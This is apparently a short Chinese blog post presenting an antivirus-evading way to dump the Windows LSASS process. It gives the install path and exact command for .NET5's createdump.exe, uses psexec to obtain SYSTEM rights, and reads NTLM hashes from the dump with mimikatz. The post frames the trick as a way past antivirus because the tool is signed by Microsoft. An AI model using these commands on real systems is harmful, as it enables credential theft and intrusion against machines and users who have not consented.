今天在twitter上发现一个dump lsass新思路。bypass av哦。
createdump.exe是.NET5 自带的工具。
.NET5 安装程序下载地址:.NET5 下载连接
安装后文件路径
language
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.0\createdump.exe
dump 命令:
language
createdump.exe -u -f xxx.dump pid
pid 为dump程序的pid值
需要system权限,管理员权限执行会报错。error 5
解决方法,psexec获取system权限。
然后就可以dump lsass进程了。
成功了,我们在用mimikatz读取就行。
我是指纹解锁,所以密码为null。但是获取到了ntlm值。
因为createdump.exe是微软自家的,所以你懂的!
参考:https://twitter.com/jas502n/status/1366604098980614144
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论